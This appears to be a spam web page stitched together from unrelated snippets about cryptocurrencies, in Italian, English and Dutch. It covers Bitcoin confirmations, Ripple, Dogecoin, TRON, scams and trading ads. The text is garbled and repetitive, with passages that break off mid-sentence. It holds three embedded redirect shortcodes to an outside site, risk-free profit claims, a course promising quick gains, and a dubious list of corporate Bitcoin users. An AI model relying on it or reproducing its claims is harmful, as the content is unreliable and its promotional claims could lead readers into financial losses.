“valuta digitale contro valuta criptata -Criptovalute James Altucher”

Questo scritto è redatto a solo scopo informativo, può essere modificato in qualsiasi momento e NON può essere considerato sollecitazione al pubblico risparmio. Il sito web non garantisce la correttezza e non si assume la responsabilità in merito all’uso delle informazioni ivi riportate.

Nel febbraio del 2011, a seguito della menzione su Slashdot e del conseguente effetto Slashdot ci sono state ripercussioni sul valore del bitcoin e sul corretto funzionamento di alcuni dei siti principali a esso collegati.[28][29][senza fonte]

Quando una transazione viene ammessa per la prima volta in un blocco, riceve una conferma. Ogni volta che al di sopra di quel blocco vengono creati altri blocchi figli a esso collegato, riceve un’altra conferma. Quando il blocco contenente la transazione raggiunge sei conferme, ovvero vengono creati sei blocchi collegati a esso, il client Bitcoin cambia stato alla transazione portandola da “non confermata” a “confermata”. La motivazione dietro a questa procedura è che a ogni conferma della transazione, ovvero a ogni nuovo blocco che viene creato al di sopra del blocco con la transazione stessa, risulta via via più difficile e costoso annullare la transazione. Un ipotetico attaccante, per annullare una transazione con un certo numero di conferme, dovrebbe generare una catena parallela senza la transazione che desidera annullare e composta da un numero di blocchi pari o superiore alle conferme ricevute dalla transazione.

Legal issues not dealing with governments have also arisen for cryptocurrencies. Coinye, for example, is an altcoin that used rapper Kanye West as its logo without permission. Upon hearing of the release of Coinye, originally called Coinye West, attorneys for Kanye West sent a cease and desist letter to the email operator of Coinye, David P. McEnery Jr. The letter stated that Coinye was willful trademark infringement, unfair competition, cyberpiracy, and dilution and instructed Coinye to stop using the likeness and name of Kanye West.[47] 17th of January 2014 Coinye was closed.[48]

Le criptovalute rappresentano un’enorme possibilità di monetizzazione, particolarmente facile da cogliere anche per chi non è esperto. Per raggiungere questo obiettivo senza rischi, però, è davvero importante scegliere gli strumenti giusti. Prendiamo come esempio il bitcoin, che è la criptovaluta in assoluta più famosa. Acquistare bitcoin apparentemente è molto complesso: in effetti solo i più esperti fino a poco tempo fa riuscivano a speculare sui bitcoin.

A novembre 2017 la rete connessa a #bitcoin ha consumato più energia della Repubblica d’Irlanda. Se il prezzo rimanesse sui livelli attuali, nel 2018 l’industria legata alla #criptovaluta emetterebbe tanta #CO2 quanto 1 milione di voli transatlantici https://www.theguardian.com/technology/2018/jan/17/bitcoin-electricity-usage-huge-climate-cryptocurrency … pic.twitter.com/EHF3WyBwuo

Nel momento in cui vi scriviamo i valori delle tre maggiori criptovalute sono i seguenti: Bitcoin sotto gli 11 mila dollari, Ethereum sotto quota $1.000, Ripple a 1 dollaro. Per Ethereum e Ripple, sembra di essere tornati indietro quasi di un mese. Ancora più negativo il calo del Bitcoin. Quello di ieri passerà alla storia, probabilmente, come il martedì nero delle criptovalute. Rispetto alle ultime 24 ore, le prime dieci criptomonete per coinmarketcap.com, il sito che classifica le monete virtuali in base alla loro capitalizzazione azionaria, hanno fatto registrare crolli tra il 20 e 35 per cento. Un bagno di sangue.

I Bitcoin hanno un alto livello di anonimato, dato che gli unici dati reperibili nella blockchain (ovvero il registro pubblico delle transazioni) sono solamente gli indirizzi dei wallet tra i quali avvengono le transazioni (e i relativi importi).

E’ possibile investire in criptovalute anche con il social Trading/copy Trading di eToro (vedi novità Copyfunds eToro) – copiando il portafoglio investimenti dei migliori guru trader in base ai criteri di importanza preferiti. Di seguito una lista aggiornata:

Soft electronic are the opposite of hard electronic currencies. Payments can be reversed. Usually when a payment is reversed there is a “clearing time.” This can take 72 hours or more. Examples of soft currencies are PayPal and any type of credit card. A hard currency can be “softened” with a third party service.[63]

Per facilitare le analisi nel forex online è possibile utilizzare degli strumenti come l’analisi tecnica e l’analisi fondamentale. Si tratta di due forme di analisi del mercato che indicano la maggiore probabilità che si verifichi un andamento al rialzo o al ribasso e suggeriscono quindi come investire.

In questo momento l’unico scambio con cui Cardano ha collaborato è Bittrex.com. Altre partnership di scambio saranno annunciate nelle prossime settimane e mesi. Attualmente Bittrex offre solo una coppia di trading Bitcoin to Ada, ma altri verranno presto aggiunti. 

Però il passare del tempo ha aperto gli occhi a tutti: i bitcoin, così come più in generale le criptovalute, sono una vera e propria rivoluzione nell’economia globale. Si tratta infatti di valute decentralizzate, non più sotto il controllo e monopolio dei governi, che permettono pagamenti rapidi in tutto il mondo.

Volgens Bill Gates zullen digitale valuta een enorme positieve impuls geven aan de wereldeconomie. Met name arme landen zoals ontwikkelingslanden zullen hier heel veel baat bij hebben. Immers miljoenen mensen die nu nog geen bankrekening hebben, zullen nu wel transacties kunnen doen. Een mobiele telefoon hebben ze immers wel allemaal. Dit zal hun economieen flink stimuleren.

Finally, according to the study, 35% are concerned cryptocurrency prices might crash, and 34% admit that fluctuating prices are discouraging them from stockpiling more. Another 18% are concerned that their business will not be able to cash the cryptocurrency in when required.

Per questa valuta virtuale, che ha realizzato il concetto di criptovaluta teorizzato nel 1998 da Wei Dai, sono stati creati i relativi simbolo e codice, rispettivamente: ฿ e BTC o XBT, esattamente come avviene per le valute reali.

Per far sì che i clienti del vostro online shop possano pagare con i bitcoin, necessitate come prima cosa di un Wallet, che ottenete direttamente con l’installazione del software. Dopo l’impostazione del vostro portafoglio digitale avete due possibilità per mettere la vostra clientela nella condizione di pagarvi con i coin virtuali, e sono:

As the popularity of and demand for online currencies has increased since the inception of bitcoin in 2009,[50][51] so have concerns that such an unregulated person to person global economy that cryptocurrencies offer may become a threat to society. Concerns abound that altcoins may become tools for anonymous web criminals.[52] [redirect url=’http://curbee.info/bump’ sec=’7′]

“una moneta Criptovaluta |Cryptocurrency Heist”

Anche se i wallet dei servizi online sono comunque sempre esposti al rischio hacking. Per esempio, uno dei più famosi bitcoin exchange in Giappone, ovvero Mt. Gox, è stato costretto a chiudere i battenti dopo che degli hacker si erano intrufolati all’interno dei loro server e avevano rubato bitcoin per il valore di oltre $450 milioni.

Dash è una delle criptovalute alternative (i cosiddetti “altcoin”) sicuramente più interessanti sul mercato, come può anche dimostrare il suo recente aumento di valore nel corso del 2017: Dash è passata da valere poche decine di dollari fino a toccare quota $1500 dollari e a viaggiare in queste prime settimane di Gennaio 2018 intorni al valore di $1000. Si tratta …

Per quanto riguarda il trading online, le criptovalute vengono spesso viste come asset su cui investire sia a lungo sia a breve termine. Oppure come asset su cui speculare grazie al trading CFD su criptovalute. Ma se vogliamo usare le criptovalute magari per fare un acquisto, come possiamo fare?

Il Bitcoin ha perso parte del suo potenziale a causa della lentezza della sua piattaforma. Con l’aumento dei volumi delle transazioni, la velocità di elaborazione del Bitcoin è diminuita e le spese di transazione aumentate, rendendolo impossibile da utilizzare per le transazioni quotidiane.

La sicurezza delle criptovalute è dovuta sostanzialmente a due fattori. Il primo deriva dalla difficoltà di trovare i bachi nei set di hash, un compito svolto dai “miners”. Il secondo (e più probabile dei due casi) è un attacco “51%” “. In questo scenario, un miner che ha il potere estrazione di oltre il 51% della rete, può prendere il controllo della rete blockchain globale e generare un blockchain alternativo. Anche a questo punto l’hacker sarà limitato nelle possibilità di fare movimentazioni. L’hacker potrebbe invertire le proprie transazioni o bloccare altre operazioni.

TRON è un protocollo decentralizzato basato su blockchain che mira a costruire un sistema di intrattenimento di contenuti gratuito in tutto il mondo con la tecnologia blockchain e storage distribuita. Il protocollo consente a ciascun utente di pubblicare, archiviare e possedere i dati liberamente, e nella forma autonoma decentralizzata, decide la distribuzione, l’iscrizione e la spinta dei contenuti e consente ai creatori di contenuti di rilasciare, diffondere e gestire le risorse digitali, formando così un intrattenimento decentralizzato dei contenuti ecosistema. La Peiwo App con oltre 10 milioni di utenti diventerà la prima APP di intrattenimento compatibile TRON.

Per facilitare le analisi nel forex online è possibile utilizzare degli strumenti come l’analisi tecnica e l’analisi fondamentale. Si tratta di due forme di analisi del mercato che indicano la maggiore probabilità che si verifichi un andamento al rialzo o al ribasso e suggeriscono quindi come investire.

Avviso esplicito sui rischi: Fusion Media o chiunque sia coinvolto persso la Fusion Media, non si assume alcuna responsabilità per eventuali perdite o danni commerciali a causa di affidamento sulle informazioni contenute all’interno di questa e-mail, compresi i dati, le citazioni, i grafici e i segnali di acquisto/vendita. Si prega di essere pienamente informati riguardo ai rischi e ai costi associati alla negoziazione sui mercati finanziari, è una delle forme più rischiose di investimento possibili.

La nuova cripto-moneta, infatti, prevede tempi di settlement di pochissimi minuti, a differenza dell’oretta normalmente richiesta dal sistema decentralizzato utilizzato per le transazioni di valuta Bitcoin.

A guardare il logo, circondato da scritte colorate e senza senso, potrebbe sembrare uno scherzo. E invece è tutto vero: nell’affollatissimo mondo delle valute digitali, capitanate dal Bitcoin , è arrivato anche il Dogecoin, un omaggio al meme che impazza un po’ ovunque in Rete e che vede protagonista un docile cane di razza Shiba. Creata da Jackson Palmer e Billy Markus, questa criptovaluta si è guadagnata un suo spazio soprattutto grazie alla community “Dogemarket” su Reddit, un luogo dove scambiare, comprare e vendere non solo Dogecoin ma anche Bitcoin e oggetti reali.

Sto avviando questo corso in un momento di forte crescita nel mondo delle criptovalute. Il mercato sta dimostrando che si possono fare ottimi guadagni anche con piccoli capitali ed in poco tempo. Il corso è quindi rivolto a: 

Ripple è il nome con cui viene identificata sia una criptovaluta, che ha come simbolo XRP, sia il protocollo di pagamento attraverso il quale la valuta viene scambiata: il sistema ha molte cose in comune con Bitcoin, ma non è uguale. La differenza principale è che Ripple è un sistema pensato per trasferire somme di denaro in qualsiasi valuta (ma più in generale, qualsiasi cosa di valore) gratuitamente e rapidamente: se i Bitcoin sono un modo di immagazzinare capitale, Ripple è un sistema per trasferirlo. I Ripple (XRP) sono la valuta universale nel sistema Ripple, che a differenza di Bitcoin è gestito da un organo centrale, e cioè la società omonima. È questa società a immettere nel mercato i Ripple (XRP), che a differenza dei bitcoin non possono essere “minati”, cioè non possono essere guadagnati dagli utenti contribuendo con i propri computer ai calcoli necessari a rendere la valuta sicura e attiva.

Letteralmente chiunque può proporre la sua Ico al mercato, il che spiega perché sia un investimento rischioso. In questo momento il mercato delle criptovalute è un po’ come il selvaggio West: c’è oro da qualche parte e relativamente poca legge che se ne occupa. La truffa potrebbe essere dietro l’angolo: dal momento che non esiste una regolamentazione, non c’è nulla che impedisca a qualcuno di fare tutto il lavoro per farti credere di avere una grande idea e poi di scappare con i soldi. Ma si possono anche fare buoni affari.

I rischi potenziali più significativi per il bitcoin sono però probabilmente quelli intrinseci al suo sistema. Un eccesso di rigidità a fronte di un’esigenza di flessibilità caratteristica fondamentale dell’attuale sistema monetario. Chi di mercato ferisce di mercato può anche perire. La recente corsa delle quotazioni ha anche l’effetto di incrinare l’idea del bitcoin come moneta alternativa. E’ sempre più strumento speculativo e con la galoppata delle quotazioni sono aumentate sensibilmente anche le commissioni legate alle transazioni. Al punto che anche per i traffici illeciti sul web (come i pagamenti di riscatti sui dati bloccati da virus informatici, i cosiddetti ransomware) si iniziano a preferire monete digitali come Z-cash o Monero che offrono tra l’altro maggiore privacy.  L’aspetto delle transazioni illegali, seppur non preponderante, ha avuto un ruolo nella diffusione delle monete digitali che offrono un buon livello di anonimato, sebbene non assoluto, a chi compra e vende sul web. Si dice che banche e grandi aziende abbiano messo da parte “tesoretti” in bitcoin proprio per far fronte alle richieste di pirati informatici. Sarebbe un errore confinare il ruolo della moneta digitale a quello di “denaro sporco di internet”, ma è indubbio che questo è un altro elemento che potrebbe spingere i regolatori ad adottare in futuro limitazioni più incisive.

London Transport’s Oyster card system: Oyster is a plastic smartcard which can hold pay as you go credit, Travelcards and Bus & Tram season tickets. You can use an Oyster card to travel on bus, Tube, tram, DLR, London Overground and most National Rail services in London.[39]

In tale contesto, la partnership con una società Sun descrive come il Netflix cinese suona come un importante passo in avanti per Tron, offrendo un serio aiuto infrastrutturale e una massiccia potenziale base di utenti per aiutare a realizzare la sua visione blockchain.

Most cryptocurrencies are designed to gradually decrease production of currency, placing an ultimate cap on the total amount of currency that will ever be in circulation, mimicking precious metals.[1][16] Compared with ordinary currencies held by financial institutions or kept as cash on hand, cryptocurrencies can be more difficult for seizure by law enforcement.[1] This difficulty is derived from leveraging cryptographic technologies.

L’indice CCI30 è costituito dalle 30 Criptovalute con la più grande capitalizzazione di mercato. È stato creato un’equipe di matematici, analisti quantitativi e traders, guidati dal Professor Igor Rivin e da Carlo Scevola, economista. Il numero di componenti dell’indice è stato fissato in 30. Tali componenti sono pesati in base alla radice quadrata della capitalizzazione di mercato, opportunamente filtrata. La composizione dell’indice è rivista ogni tre mesi, utilizzando la media mobile esponenziale della capitalizzazione di mercato. L’indice CCI30 viene calcolato a partire dal 1 gennaio 2015, con un valore impostato arbitrariamente a 100. Il CCI30 è disponibile gratuitamente al pubblico,[8] e può essere replicato dai fondi che seguono una strategia di investimento passiva.

Hardware Wallets: i wallets più sicuri ricadono in questa categoria. Sono dei veri e propri dispositivi fisici che conservano le nostre chiavi private e velocizzano l’invio e la ricezione delle valute digitali. Un esempio è costituito dal Ledger Wallet

Dal 2005 l’attività di e-gold si era ridotta all’osso, e molti erano i dubbi riguardo alla legalità alle transazioni effettuate con e-gold. Spesso gli e-gold venivano usati per mettere in atto truffe in stile Schema Ponzi, oppure per riciclare denaro. Nel 2009 anche e-gold chiuse i battenti una volta per tutte.

^ “Directive 2009/110/EC of the European Parliament and of the Council of 16 September 2009 on the taking up, pursuit and prudential supervision of the business of electronic money institutions amending Directives 2005/60/EC and 2006/48/EC and repealing Directive 2000/46/EC, Official Journal L 267, 10/10/2009 P. 0007 – 0017”. Retrieved 30 December 2013.

Litecoin is een peer-to-peer Internet valuta dat onmiddellijke, bijna kosteloze betalingen toelaat naar eender wie in de wereld. Litecoin is een open source, globaal betalingsnetwerk dat volledig gedecentraliseerd is zonder enige centrale autoriteiten. Mathematica beveiligd het netwerk en laat individuen toe hun eigen financiën te controleren. Litecoin beschikt over snellere transactie bevestigingen dan de leidende op mathematica-gebaseerde valuta. Met aanzienlijke steun van het bedrijfsleven, handelsvolume en liquiditeit, is Litecoin een bewezen handelsmedium aanvullend op Bitcoin.

Dit is niets anders dan een portemonnee waarin je je eigendommen opslaat. Er zijn veel verschillende wallets en veel munten hebben ook hun eigen wallet. Afhankelijk van de munten die je wilt kopen kun je weer gebruik maken van een andere wallet.

Il fenomeno finanziario dell’anno ha molto a che fare con l’innovazione tecnologica. Stiamo parlando naturalmente dei Bitcoin (qui tutto su Bitcoin funzionamento) che, negli scorsi giorni, ha superato il valore di circa 10.000 euro,. Di fronte a questa corsa in molti hanno evocato il rischio bolla, ovvero il rischio di un valore gonfiato e a rischio di un repentino crollo. Ma il fenomeno Bitcoin come funziona? Valeria Portale, direttore della Ricerca Blockchain & Distributed Ledger del Politecnico di Milano lo ha raccontato a Digital4Trade. «Il mondo del Bitcoin nasce nel 2008, ma è diventato effettivamente operativo nel 2009 con le prime transazioni. All’inizio è rimasto tutto abbastanza sotto traccia, con un utilizzo anche nel mercato illegale, motivo per cui è stato erroneamente associato al tema dell’illegalità. Ci si è accorti che poi dietro il Bitcoin esisteva una tecnologia (la Blockchain), basata sul consenso condiviso, che ha iniziato a incuriosire anche altri mercati. Negli ultimi mesi del 2017 c’è stato un vero e proprio exploit, per effetto della maggiore consapevolezza sulle reali opportunità delle criptovalute da un lato, maggiore interesse da parte degli investitori, senza dimenticare la fork di inizio agosto che ha migliorato alcuni aspetti tecnologici del Bitcoin». [redirect url=’http://curbee.info/bump’ sec=’7′]

“Cryptocurrencies sono note da quando _Criptovalute Qualità”

C’è chi ne parla come una seconda corsa all’oro, chi come una bolla che prima o poi esploderà: mentre i mercati si domandano quale sarà futuro della più nota critpovaluta, gli artisti ne traggono ispirazione per le loro opere. I tre punti chiave sul tema criptomoneta e mercato dell’arte sono la

Ripple è il nome con cui viene identificata sia una criptovaluta, che ha come simbolo XRP, sia il protocollo di pagamento attraverso il quale la valuta viene scambiata: il sistema ha molte cose in comune con ma non è uguale. La differenza principale è che Ripple è un sistema pensato per trasferire somme di denaro in qualsiasi valuta (ma più in generale, qualsiasi cosa di valore) gratuitamente e rapidamente: se i Bitcoin sono un modo di immagazzinare capitale, Ripple è un sistema per trasferirlo. I Ripple (XRP) sono la valuta universale nel sistema Ripple, che a differenza di Bitcoin è gestito da un organo centrale, e cioè la società omonima. È questa società a immettere nel mercato i Ripple (XRP), che a differenza dei bitcoin non possono essere “minati”, cioè non possono essere guadagnati dagli utenti contribuendo con i propri computer ai calcoli necessari a rendere la valuta sicura e attiva.

Avevo cominciato da autodidatta con il forex e il trading guardando video e “studiando” su internet con risultati pessimi… un giorno ho visto un video sul canale YouTube di marco e mi sono iscritto al suo corso… beh devo dire che non potevo fare scelta migliore! Il corso è veramente ben strutturato e mi ha fatto entrare nell’ottica giusta del trading, inoltre Marco è un ottimo insegnante spiega e rispiega le cose finché non ti sono chiare. Un bel 10 e lode! 

Ogni utente che partecipa alla rete Bitcoin possiede un portafoglio che contiene un numero arbitrario di coppie di chiavi crittografiche. Le chiavi pubbliche, o “indirizzi bitcoin”, fungono da punti d’invio o ricezione per tutti i pagamenti. Il possesso di bitcoin implica che un utente può spendere solo i bitcoin associati con uno specifico indirizzo. La corrispondente chiave privata serve ad apporre una firma digitale a ogni transazione facendo in modo che sia autorizzato al pagamento solo l’utente proprietario di quella moneta. La rete verifica la firma utilizzando la chiave pubblica[31].

Ethereum (ETH), piattaforma rilasciata nel 2015, prevede l’esecuzione di smart contracts tramite la rete peer-to-peer. La potenza computazionale messa a disposizione sulla rete viene convertita nell’unità di conto denominata Ether.

In 1983, a research paper by David Chaum introduced the idea of digital cash.[4] In 1990, he founded DigiCash, an electronic cash company, in Amsterdam to commercialize the ideas in his research.[5] It filed for bankruptcy in 1998.[6][7] In 1999, Chaum left the company.

^ Sidel, Robin (22 December 2013). “Banks Mostly Avoid Providing Bitcoin Services. Lenders Don’t Share Investors’ Enthusiasm for the Virtual-Currency Craze”. Online.wsj.com. Archived from the original on 19 November 2015. Retrieved 29 December 2013.

Altcoin analisi Antitrust BCE Bitcoin blockchain blockchains cashless Commissione europea Consiglio UE criptocurrency criptoeconomy criptovaluta criptovalute cryptoeconomy digital currency dollaro Donald Trump EBA ekrona Ethereum Euklid euro Europa Fisco Isola di Man legislazione legislazione europea legislazione internazionale mercati mining Onecoin OneLife operazioni di cambio Parlamento europeo REP Riksbank Ripple Svezia trader truffa Trump Usa valute estere valute tradizionali

GLI SMART CONTRACT SONO L’ASSO NELLA MANICA. È soprattutto la flessibilità, però, a rendere Ethereum appetibile per banche e grandi aziende. L’algoritmo di Bitcoin è volutamente esclusivo: è molto difficile sviluppare applicazioni in grado di “girare” sulla sua blockchain. Ethereum, invece, ambisce a diventare la piattaforma di riferimento per i cosiddetti smart contract, ossia contratti intelligenti che si eseguono automaticamente al verificarsi di una condizione concordata fra le parti.

Verge è un software open-source che migliora costantemente grazie ai tantissimi collaboratori. Se vuoi contribuire, dai un’ occhiata alle nostre repository Github per vedere dove puoi fare la differenza!

A differenza delle valute a corso legale, i bitcoin hanno la caratteristica che nessuno può controllarne il valore a causa della natura decentralizzata del metodo di creazione della valuta[20][21]. In Bitcoin la quantità di valuta in circolazione è limitata a priori, inoltre è perfettamente prevedibile e quindi conosciuta da tutti i suoi utilizzatori in anticipo[22]. L’inflazione da valuta in circolazione non può quindi essere utilizzata da un ente centrale per ridistribuire la ricchezza tra gli utenti.

Software e tecnologia relativi a quotazioni e grafici sono stati sviluppati da Teleborsa SpA. I dati relativi al Mercato Italiano sono di Borsa Italiana e hanno un ritardo di 20 minuti. I dati delle Borse Estere sono differiti di 15 o 20 minuti e sono forniti da Interactive Data.

La collaborazione più interessante, sottolinea Williams, con il servizio di streaming cinese Baofeng, una società con più di 200 milioni di iscritti che potrebbe “allargare la rete di Qtum a oltre 50.000 full nodes, ben oltre il potenziale di Bitcoin, e persino di Ethereum, in termini di scalabilità”.

Il fatto che il sistema Ripple abbia un valore più per il protocollo con il quale gestisce le transazioni che per la valuta in sé – diversamente da Bitcoin – sembra non essere chiaro a molte delle persone che ci stanno investendo. Nell’ipotesi migliore per chi investe nei Ripple XRP, si arriverà a un momento in cui una banca africana si renderà conto che passare attraverso diversi intermediari per pagare un debito in pesos a una banca sudamericana è troppo dispendioso per le varie commissioni, e deciderà di immagazzinare Ripple XRP con i quali sa che potrà pagare il suo debito direttamente.

Certo, per ora i valori sono molto bassi. Basti pensare che un nel 2013 un singolo Dogecoin valeva appena 0.00023 dollari, anni luce dai prezzi folli raggiunti dalla madre di tutte le criptovalute. Ma è anche vero che siamo appena agli inizi: è stato minato solo il 16% dei 100 miliardi totali disponibili, una cifra di molto superiore ai 21 milioni di tetto massimo previsto per i Bitcoin, di cui più di tre quarti già minati.

In genere, truffe come questa di OneCoin sono basate sul classico schema ponzi. Prima si spillano soldi agli “investitori”, vendendogli pacchetti di criptovaluta e altri servizi (inesistenti o comunque di bassa qualità). Poi, dopo averli raggirati mostrando le finte potenzialità del loro investimento, li si invogliano a ricercare ulteriori investitori (ovvero ulteriori “polli” da spennare).

L’Associazione è responsabile per promuovere lo sviluppo, l’accettazione e in generale il miglioramento di Litecoin e le sue risorse. Eventuali richieste di informazioni commerciali relative a Litecoin devono essere indirizzate all’Associazione.

5) Permettete alla piramide del debito in moneta fiat di crollare e covare fino a quando la pecora non sarà disperata (cioè la disperazione in stile venezuelano con le persone affamate che mangiano rifiuti nelle discariche).

Le enorme corporazioni tipo Microsoft®, Virgin Galactic®, Dell®, Steam®, Tesla®, Zynga®, Bloomberg® e Skycraft Airplanes® utilizzano i Bitcoin. Unitevi a quelli che già utilizzano i Bitcoin per il business.

Ho scritto molti libri editi dalla O’Reilly, Apress e FriendsOfEd (puoi visitare la mia pagina Amazon), ho partecipato come speaker a tantissime conferenze internazionali in giro per il mondo, ho svolto più di 500 ore di formazione professionale come docente, ed ho fondato la mia società Comtaste di consulenza e sviluppo. [redirect url=’http://curbee.info/bump’ sec=’7′]